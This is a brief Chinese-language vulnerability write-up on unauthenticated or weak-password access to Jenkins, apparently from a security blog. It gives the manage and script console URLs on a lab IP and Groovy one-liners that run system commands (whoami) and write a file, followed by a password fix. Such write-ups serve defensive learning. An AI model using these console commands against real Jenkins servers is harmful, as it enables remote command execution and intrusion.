Jenkins未授权访问漏洞

服务简介

Jenkins是一个开源软件项目，是基于Java开发的一种持续集成工具，用于监控持续重复的工作，旨在提供一个开放易用的软件平台，使软件的持续集成变成可能。Jenkins默认监听端口为8080。

产生原因

未设置密码或使用了弱口令。

漏洞利用

弱口令登录后或有未授权访问漏洞时访问：

http://192.168.83.99:8080/manage

http://192.168.83.99:8080/script

在脚本命令行中执行 println "whoami".execute().text，可执行命令

命令new File("/tmp/1.txt").write('hello');可以写文件

修复方法

1）设置访问密码或修改弱口令。

您可能感兴趣的文章

• Jupyter Notebook未授权访问漏洞
• ZooKeeper未授权访问
• memcache未授权访问
• Redis 未授权访问漏洞
• rsync未授权访问漏洞
• Hadoop Yarn REST API未授权访问漏洞